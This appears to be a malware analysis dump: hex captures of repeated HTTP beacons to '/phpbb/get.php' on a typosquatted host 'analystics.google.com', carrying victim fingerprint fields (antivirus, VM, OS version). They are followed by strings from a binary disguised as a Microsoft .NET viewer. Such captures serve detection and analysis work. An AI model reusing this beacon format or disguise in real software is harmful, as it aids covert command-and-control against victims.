0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6a 752f6647 7a645468 4d492048   abjju/fGzdThMI H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 2b535a4e 4d74494f 49682048   abjk+SZNMtIOIh H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6a 41776447 32755455 6f772048   abjjAwdG2uTUow H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a75 46485651 6f436442 75662048   abjuFHVQoCdBuf H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....


Strings
edWP.rsrcVttceuritorla
\
.CC
 
.

040904B0
1s%P
2.0.50727.42
2.0.50727.42 (RTM.050727-4200)
bsJP2
Comments
CompanyName
credui.dll
&File
FileDescription
FileVersion
Flavor=Retail
                                 H
         (((((                  H
H|1%i
h&About ...
&Help
         h((((                  H
iE&xit
InternalName
Js2P
JSOPEN
KERNEL32.DLL
LegalCopyright
MAINICON
Microsoft
Microsoft Corporation
 Microsoft Corporation.  All rights reserved.
Microsoft .NET viewer
mscoree.dll
MS Shell Dlg
 .NET Framework
NETFXSBS10.exe
OriginalFilename
ProductName
ProductVersion
SCRIPTS
ssPP
StringFileInfo
Translation
{tw-
VarFileInfo
VS_VERSION_INFO
=(@"[@
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
03_nuj
0A@@Ju
:0^B$r
0/P4v4
0SSSSS
0xbkNE
'11899AA@KI
'11-899@@QGO
#''(-12..91-00
1@6,aF
((1-823908QKFB
18A@k>
$$(("-2...
 '-223
-'-23399
'2899AJA
#''(((-3.....
30AAj_
:::3$x
4BRsju
4%Fkep
.4sZL_3n6J
53	J@|
5BuyW|
5n]aaaa%
6~4e;~
\"}6;b
6>Mbbbbbb%
6=`qqqq4
6u^Mq%
6V"#c:
7~*67~#
7DaMMMMM%
7-#g3RMa?K
7^g[F8
7~nC7~
7,OdddddeydNc%
,]845I^
'889JJJjx
-'899AlG
'8@AJJJP
;[8"=j
'9AJjjj;
'9AJjjjm
'9AJkjjn
9M+,(w%
9t(g9o
[%9z`'
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
An application has made an attempt to load the C runtime library incorrectly.
apjH ?
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
A \z5C
,>bddd>
BeginPaint
Bigggggg
Biiiiiii
BoMbb%
bTYE=S^Q
bXb$Sg
$ceepq
cE(w6B
cgego4
CloseHandle
CorExitProcess
>cQjL)M
- CRT not initialized
d}23	i
@.data
d%}.c!Lw
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
D{!J(4:	
DOMAIN error
,( DxwT
&dyyyyy
)-/+@EC+
eeegeeeeeeeeeey
&Eggggggged
elB%sJ
EncodePointer
EndPaint
EnterCriticalSection
erbhn$.>
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
+Eyyyyy%
eyyyyyyeyyyyyyy
F{3M<A
fB{A!$J
F_ddd%
February
fEeeeeeee
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
Fogci9y
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
.FrMt\
]-#g3RMv
GDrqq)
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GF+v^:*
ggggggggggggggg<n
_gKhn"+
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
'Hl'I|L
Hlum^^^^=
HSQ}|{{tnUWUUWUUUUU=
I}AWjX	3
iB4J*P
i}b-jZ
~iFFI6
iiiiiiii
Ijc88]#x
InitializeCriticalSectionAndSpinCount
;INNNNNdNNd%
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
`J8%} 
JanFebMarAprMayJunJulAugSepOctNovDec
January
'@@JJjj}f
j@j ^V
jKns4%
jWy*tjq?
kernel32.dll
KERNEL32.dll
KKKKKKKK<
Kl_Jka@h5
K&{nC_
{kQ#}f
Kqwy(dhqx
*Ktuo]]]]=
l2OUfmB
LaElB,O
Last modified: Mayc
LCMapStringA
LCMapStringW
LeaveCriticalSection
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LkGo9m
L|{o^^=
LoadLibraryA
LoadLibraryW
lstrcmpiA
Lttm[]]]]4
LuuR^^^^=
L}|v\]]=
M4\9h%cjM8
?Mccccccc%
MessageBoxA
Microsoft Visual C++ Runtime Library
mK/HRM>
mm____4
MM/dd/yy
:_MMMMMb%
mmpppp4
;MNNNNNNNN%
Monday
moTUTTTTTTUUT=
mQ1aPN
mRpppp4
MultiByteToWideChar
Mv!=r-I
Njmvvm
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ntdll.dll
=nUFPla
nX\\\\[=
nYZYYYY[=
o#6$;6@:
`OBB|M
October
"O$D9d
oftware). 
o)>IG4F
^)OKTIq
:oqcbb%
`OrA|M
p___^^^^>]>]]>]>]>]>=
p_bQl]
;pcNNdEI%
P/EyVk8R
Please contact the application's support team for more information.
PPPPPPPP
Program: 
<program name unknown>
pUOs2rH
- pure virtual function call
pwju?]{o
Q-ANeesL
qohqA=
:]qqqqq%
QueryPerformanceCounter
Q}|vU\\\\=
^qwf^hu
`.rdata
Rn````4
RR````4
RTaaaa4
RtlUnwind
runtime error 
Runtime Error!
RUXXWXXXXW=
Rv|,(Q
RVVVGGGFFF::CCC//
RVVVGGGGFFFFF::::CCCC/////<
R:wUlZIS
RXYYXYXXX=
R"(=zj
r	^zPY
s7~ls7~
Saturday
sd>W8"=
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
]Sgcz.
!'/SHG
ShowWindow
SING error
SIV )n
=SOFTu
SOFTWARE LICENSE AGREEMENT
\s'R_8m
strstr
s|u]^=
Sunday
SunMonTueWedThuFriSat
Svm____4
\t^]6:
;t99P/;
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
{T~Iqfb
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tn]]]]\4
~~to[\[\\\=
t"SS9]
,TTTTonmvuttuvmnTTTTTTTTTTTTTTTT=
t$<"u	3
Tuesday
;t$,v-
tvnXXYY[ZZY=
t+WWVPV
U2>VQ?
u$7X-t
uBh~(@
<um^^^^=
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
u{)'NL
UpdateWindow
UQPXY]Y[
URPQQh0Y@
USER32.dll
USER32.DLL
,[UTnv
UUULl|l
UUUTllv|g
UUUUUUUUUP
UUUUUUUUUUUUUUUUUUP
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUP
uUUUUUUUW
UUUUUUUUW
uUUUUUUW
UUUUUUUW
UUUUUUW
uUUUUUWwwwwwwwwwUUUU
uUUUUW
UUUUUW
UUUUUWw
uUUWwwwwUU
{uX]]]=
v0RI\n
v[\\\\\4
]V4WA<,
v/^IdX:
VirtualAlloc
VirtualFree
/vLxN.dS
vm^___=
vm1Mn'Y
:VMcccc%
v	N+D$
V!NKWzC
vQ}+t8
-W+]" 
Wednesday
Wf`J[*
WideCharToMultiByte
wj<o5C
WLMqgV
WriteFile
wUUUUUUUUUWwwwwwwwwwwwwwuUUUUU
x@*0FO
X7fo;<
|[?XB]N
xuUUUUUUUUW
Yc,j]	R
Y<G6yQ
yGp?jy
YMz</[1
YO!\d$
>=Yt1j
yyyyyy
z1Rich
!zA#=i
z	RP(OE
zWnFc)-
zz;=H8
|{zzzzzz{|tmoTTTTTTTTTTTTT=